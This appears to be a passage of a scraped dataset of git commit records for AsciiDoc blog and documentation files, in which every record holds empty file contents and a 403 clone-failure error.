'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8616db6af9877657f2e2509546258af2d2b3336","subject":"update tag filtering examples and fix errors in tag update\/delete examples","message":"update tag filtering examples and fix errors in tag update\/delete examples\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e8b36d95721b4f6369ad1226d629ae9bce2aafd1","subject":"Create README.adoc","message":"Create README.adoc","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"maven-archetype\/README.adoc","new_file":"maven-archetype\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8b158e1fc9274226a2d2ff590474f5bc84a834a","subject":"Update 2016-10-07-draft-how-to-configure-deamon-docker-on-osx.adoc","message":"Update 2016-10-07-draft-how-to-configure-deamon-docker-on-osx.adoc","repos":"PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io","old_file":"_posts\/2016-10-07-draft-how-to-configure-deamon-docker-on-osx.adoc","new_file":"_posts\/2016-10-07-draft-how-to-configure-deamon-docker-on-osx.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/PierreBtz\/pierrebtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"7f9ad1a32b203fd8d895395a65ca1412aa0c91fa","subject":"Create test.adoc","message":"Create test.adoc","repos":"drom\/wavedrom,drom\/wavedrom,drom\/wavedrom","old_file":"test\/test.adoc","new_file":"test\/test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/drom\/wavedrom.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"830c2085d2d0f9daf0d7baa472683c7561ac6e34","subject":"Update 2015-09-21-How-to-Think-Like-a-Computer-Scientist.adoc","message":"Update 2015-09-21-How-to-Think-Like-a-Computer-Scientist.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-How-to-Think-Like-a-Computer-Scientist.adoc","new_file":"_posts\/2015-09-21-How-to-Think-Like-a-Computer-Scientist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"a72fdb7eb4804bcc1f0540163454d7d75e0f15a7","subject":"Update 2016-11-27-Apimans-New-Execute-Blocking-Component.adoc","message":"Update 2016-11-27-Apimans-New-Execute-Blocking-Component.adoc","repos":"msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com","old_file":"_posts\/2016-11-27-Apimans-New-Execute-Blocking-Component.adoc","new_file":"_posts\/2016-11-27-Apimans-New-Execute-Blocking-Component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/rhymewithgravy.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"fb1ff03ec0821c345711d51d3982cef9c6549f26","subject":"Create BuildingInWindows.adoc","message":"Create BuildingInWindows.adoc","repos":"igagis\/morda,igagis\/morda,igagis\/morda","old_file":"wiki\/BuildingInWindows.adoc","new_file":"wiki\/BuildingInWindows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/morda.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"f42e7e186fdaf9612b7c43222151b99bc51f237b","subject":"Moved the Forge instructions from readme.asciidoc to readme-forge.asciidoc","message":"Moved the Forge instructions from readme.asciidoc to readme-forge.asciidoc\n","repos":"devoxx4kids\/materials,ooms\/materials,ooms\/materials,devoxx4kids\/materials,ooms\/materials,devoxx4kids\/materials,ooms\/materials,devoxx4kids\/materials,devoxx4kids\/materials,ooms\/materials,devoxx4kids\/materials,ooms\/materials,ooms\/materials,devoxx4kids\/materials","old_file":"workshops\/minecraft\/readme-forge.asciidoc","new_file":"workshops\/minecraft\/readme-forge.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ooms\/materials.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"}
{"commit":"bae4864e5eadd4afcd320c5ae0abed3997c1e023","subject":"Add RELEASE.adoc to describe the release process","message":"Add RELEASE.adoc to describe the release process\n","repos":"jotak\/hawkular-grafana-datasource,hawkular\/hawkular-grafana-datasource,hawkular\/hawkular-grafana-datasource,jotak\/hawkular-grafana-datasource,hawkular\/hawkular-grafana-datasource,jotak\/hawkular-grafana-datasource","old_file":"RELEASE.adoc","new_file":"RELEASE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-grafana-datasource.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"738b6ddab3f648a0c6d8c6ff972d057396c6f79a","subject":"1.3.0 release blog","message":"1.3.0 release blog\n","repos":"msavy\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io,msavy\/apiman.github.io,msavy\/apiman.github.io,msavy\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io","old_file":"_blog-src\/_posts\/2017-05-10-release-1.3.adoc","new_file":"_blog-src\/_posts\/2017-05-10-release-1.3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/apiman.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"955da56fe3e35c886c2675f5b44ec80c1f305b0c","subject":"Update 2016-04-13-Administracion-Remota.adoc","message":"Update 2016-04-13-Administracion-Remota.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-13-Administracion-Remota.adoc","new_file":"_posts\/2016-04-13-Administracion-Remota.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"93a822a6d65e48414591034654d12c453499240f","subject":"Trim introductory material.","message":"Trim introductory material.\n","repos":"joyent\/rfd,davepacheco\/rfd,joyent\/rfd,davepacheco\/rfd,davepacheco\/rfd,melloc\/rfd,joyent\/rfd,joyent\/rfd,davepacheco\/rfd,melloc\/rfd,davepacheco\/rfd,melloc\/rfd","old_file":"rfd\/0106\/README.adoc","new_file":"rfd\/0106\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joyent\/rfd.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"}
{"commit":"a67ffc62d5ac1b87d96a16238676e26765512c73","subject":"y2b create post Turn Your Phone Into A Breathalyzer!","message":"y2b create post Turn Your Phone Into A Breathalyzer!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-06-Turn-Your-Phone-Into-A-Breathalyzer.adoc","new_file":"_posts\/2016-07-06-Turn-Your-Phone-Into-A-Breathalyzer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"70a8ce25bae58a35c9ea4609ff6f1aa2149c42dc","subject":"CL note: suppress banner","message":"CL note: suppress banner\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"}
{"commit":"48e906bb66a9ce5b857cc2df3236c900a84ba022","subject":"Update 2015-05-16-genial.adoc","message":"Update 2015-05-16-genial.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-genial.adoc","new_file":"_posts\/2015-05-16-genial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"377c399331672bc60d0e21d5301170402e5f14b4","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"cd65e6bc1f8f63d65a403dfcb2d86be03c983222","subject":"Update 2017-10-20-Mac-Tableau-Desktop-Treasure-Data.adoc","message":"Update 2017-10-20-Mac-Tableau-Desktop-Treasure-Data.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-20-Mac-Tableau-Desktop-Treasure-Data.adoc","new_file":"_posts\/2017-10-20-Mac-Tableau-Desktop-Treasure-Data.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"9bdf26e5bdd93afeb80c93c58f593b5d7be05d3d","subject":"Update 2016-07-15-Chairpersons-Chinwag-July-Edition.adoc","message":"Update 2016-07-15-Chairpersons-Chinwag-July-Edition.adoc","repos":"Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io","old_file":"_posts\/2016-07-15-Chairpersons-Chinwag-July-Edition.adoc","new_file":"_posts\/2016-07-15-Chairpersons-Chinwag-July-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Perthmastersswimming\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"cff9c773dc3d9e34ba77606ea196d9dec774df09","subject":"Update 2019-01-31-Convert-snake-case-to-camel-Case-in-Vim.adoc","message":"Update 2019-01-31-Convert-snake-case-to-camel-Case-in-Vim.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2019-01-31-Convert-snake-case-to-camel-Case-in-Vim.adoc","new_file":"_posts\/2019-01-31-Convert-snake-case-to-camel-Case-in-Vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"c755033feed08313a8ff8864b9fac303a93bdb16","subject":"update TESTING doc to use run.sh script","message":"update TESTING doc to use run.sh script\n","repos":"jeteve\/elasticsearch,wenpos\/elasticsearch,pablocastro\/elasticsearch,Collaborne\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,rmuir\/elasticsearch,ZTE-PaaS\/elasticsearch,andrestc\/elasticsearch,Kakakakakku\/elasticsearch,mrorii\/elasticsearch,Siddartha07\/elasticsearch,nomoa\/elasticsearch,uschindler\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,caengcjd\/elasticsearch,ivansun1010\/elasticsearch,smflorentino\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,mcku\/elasticsearch,szroland\/elasticsearch,lightslife\/elasticsearch,strapdata\/elassandra5-rc,yongminxia\/elasticsearch,EasonYi\/elasticsearch,dylan8902\/elasticsearch,jchampion\/elasticsearch,scottsom\/elasticsearch,fforbeck\/elasticsearch,SergVro\/elasticsearch,sarwarbhuiyan\/elasticsearch,tsohil\/elasticsearch,petabytedata\/elasticsearch,schonfeld\/elasticsearch,coding0011\/elasticsearch,mrorii\/elasticsearch,kunallimaye\/elasticsearch,linglaiyao1314\/elasticsearch,andrestc\/elasticsearch,jeteve\/elasticsearch,NBSW\/elasticsearch,ydsakyclguozi\/elasticsearch,beiske\/elasticsearch,mute\/elasticsearch,i-am-Nathan\/elasticsearch,LewayneNaidoo\/elasticsearch,kevinkluge\/elasticsearch,linglaiyao1314\/elasticsearch,himanshuag\/elasticsearch,andrestc\/elasticsearch,Kakakakakku\/elasticsearch,mapr\/elasticsearch,polyfractal\/elasticsearch,SergVro\/elasticsearch,scottsom\/elasticsearch,zkidkid\/elasticsearch,bestwpw\/elasticsearch,tsohil\/elasticsearch,kimimj\/elasticsearch,Collaborne\/elasticsearch,SergVro\/elasticsearch,scottsom\/elasticsearch,zkidkid\/elasticsearch,bestwpw\/elasticsearch,tsohil\/elasticsearch,kimimj\/elasticsearch,strapdata\/elassandra5-rc,yongminxia\/elasticsearch,EasonYi\/elasticsearch,dylan8902\/elasticsearch,jchampion\/elasticsearch,fforbeck\/elasticsearch,SergVro\/elasticsearch,sarwarbhuiyan\/elasticsearch,tsohil\/elasticsearch,petabytedata\/elasticsearch,schonfeld\/elasticsearch,coding0011\/elasticsearch,mrorii\/elasticsearch,kunallimaye\/elasticsearch,linglaiyao1314\/elasticsearch,andrestc\/elasticsearch,jeteve\/elasticsearch,NBSW\/elasticsearch,ydsakyclguozi\/elasticsearch,beiske\/elasticsearch,mute\/elasticsearch,i-am-Nathan\/elasticsearch,LewayneNaidoo\/elasticsearch,kevinkluge\/elasticsearch,himanshuag\/elasticsearch,mapr\/elasticsearch,polyfractal\/elasticsearch","old_file":"TESTING.asciidoc","new_file":"TESTING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"858bb15d61ace1842ab154c197ef0a91f5298cd1","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"d578ec7fc688bceebedb5cf4ca2bc3ec3a5e54d1","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"71dcf8d30df27f87232aea3dd5883ec99e902aa1","subject":"Update 2011-10-112-Peak-Java.adoc","message":"Update 2011-10-112-Peak-Java.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"_posts\/2011-10-112-Peak-Java.adoc","new_file":"_posts\/2011-10-112-Peak-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"294dc76d1d05cffff20943be1597f5272411028f","subject":"Update 2016-10-20-some-words.adoc","message":"Update 2016-10-20-some-words.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"_posts\/2016-10-20-some-words.adoc","new_file":"_posts\/2016-10-20-some-words.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"8301d1cee39d8812ef2ceca436d8d9dc1754cc5a","subject":"Update 2015-06-30-slack-stamp.adoc","message":"Update 2015-06-30-slack-stamp.adoc","repos":"yysk\/yysk.github.io,yysk\/yysk.github.io,yysk\/yysk.github.io","old_file":"_posts\/2015-06-30-slack-stamp.adoc","new_file":"_posts\/2015-06-30-slack-stamp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yysk\/yysk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"675117697c84189f65dd74915386d315ec17ebb9","subject":"Update 2015-11-14-Programacao.adoc","message":"Update 2015-11-14-Programacao.adoc","repos":"homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io","old_file":"_posts\/2015-11-14-Programacao.adoc","new_file":"_posts\/2015-11-14-Programacao.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/homenslibertemse\/homenslibertemse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"fe98fe2f5d42355bd796b387ef52ea35a338a70d","subject":"Update 2016-08-20-hello-world.adoc","message":"Update 2016-08-20-hello-world.adoc","repos":"bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io","old_file":"_posts\/2016-08-20-hello-world.adoc","new_file":"_posts\/2016-08-20-hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitcowboy\/bitcowboy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"a7eb354196f12d3443ab4d5353173321af3eef00","subject":"Update 2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","message":"Update 2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","new_file":"_posts\/2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"9fe9bb88ef0294cadd3bb0f5ad8e96949040dd27","subject":"y2b create post The Music Wrap - Does It Suck?","message":"y2b create post The Music Wrap - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-07-The-Music-Wrap--Does-It-Suck.adoc","new_file":"_posts\/2017-04-07-The-Music-Wrap--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"4e1a2085e47ee7c9759b62bcc629354ad4648344","subject":"Update 2016-02-10-2-am.adoc","message":"Update 2016-02-10-2-am.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-02-10-2-am.adoc","new_file":"_posts\/2016-02-10-2-am.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b712afd6edaa108a43edf082833eea42e64c55ec","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"004d303cb77b89160c0499af2b7c4bb5cfb8df6a","subject":"y2b create post How To KILL The Samsung Bixby Button...","message":"y2b create post How To KILL The Samsung Bixby Button...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-19-How-To-KILL-The-Samsung-Bixby-Button.adoc","new_file":"_posts\/2017-09-19-How-To-KILL-The-Samsung-Bixby-Button.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"d7a02bfe806a4caa50fad9f52a29a7247151effd","subject":"Update 2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","message":"Update 2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","new_file":"_posts\/2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"a5844573508aeb568d690a7be48934e28121921c","subject":"Update 2017-09-24-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","message":"Update 2017-09-24-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-09-24-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_file":"_posts\/2017-09-24-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"e248a6715810d51914158b19d118932fd79fc3e7","subject":"Update 2015-05-23-test.adoc","message":"Update 2015-05-23-test.adoc","repos":"rvegas\/rvegas.github.io,rvegas\/rvegas.github.io,rvegas\/rvegas.github.io","old_file":"_posts\/2015-05-23-test.adoc","new_file":"_posts\/2015-05-23-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rvegas\/rvegas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"47d203b7eb1449b960aad6aea11bdc4fd6760e6a","subject":"Convert double quotes to backticks","message":"Convert double quotes to backticks\n\nThis is primarely intended to test a new script an my server... :)\n","repos":"rumpelsepp\/snap","old_file":"man\/snap.1.adoc","new_file":"man\/snap.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/snap.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"adedd9833cccdf669fd6e9116fc950700a838587","subject":"Added author","message":"Added author\n","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-01-28-CDI-Vette-truukjes-met-Instance.adoc","new_file":"_posts\/2016-01-28-CDI-Vette-truukjes-met-Instance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"643a5260e8be5b980fcb42dfbde5a43182465d4d","subject":"y2b create post Any Color iPhone 7 Plus... But How?","message":"y2b create post Any Color iPhone 7 Plus... But How?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-01-Any-Color-iPhone-7-Plus-But-How.adoc","new_file":"_posts\/2017-04-01-Any-Color-iPhone-7-Plus-But-How.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"96ed096bb142e4c4f6b540a0be4cb628b87b25c8","subject":"Renamed '_posts\/2017-09-30-Front-end-web-developer-courses.adoc' to '_posts\/2017-09-30-Front-End-Web-Developer-Courses.adoc'","message":"Renamed '_posts\/2017-09-30-Front-end-web-developer-courses.adoc' to '_posts\/2017-09-30-Front-End-Web-Developer-Courses.adoc'","repos":"sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io","old_file":"_posts\/2017-09-30-Front-End-Web-Developer-Courses.adoc","new_file":"_posts\/2017-09-30-Front-End-Web-Developer-Courses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sidmusa\/sidmusa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"44ad10ee119c611d4e42ee630e72905f13600266","subject":"Fix after merge conflicts","message":"Fix after merge conflicts\n","repos":"RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j,RobWin\/circuitbreaker-java8,drmaas\/resilience4j,javaslang\/javaslang-circuitbreaker,drmaas\/resilience4j,mehtabsinghmann\/resilience4j,resilience4j\/resilience4j,goldobin\/resilience4j","old_file":"resilience4j-documentation\/src\/docs\/asciidoc\/addon_guides\/ratpack.adoc","new_file":"resilience4j-documentation\/src\/docs\/asciidoc\/addon_guides\/ratpack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"f260939ccf55368dfbeb7f5d7abcf923bb5885e5","subject":"Fix #630","message":"Fix #630\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/technical notes\/Bitcoin configuration\/Local bitcoin environment.asciidoc","new_file":"fermat-documentation\/technical notes\/Bitcoin configuration\/Local bitcoin environment.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"fe84f6ec532c2d875357f76c73eb5f147b789a04","subject":"Add alternative description","message":"Add alternative description\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"}
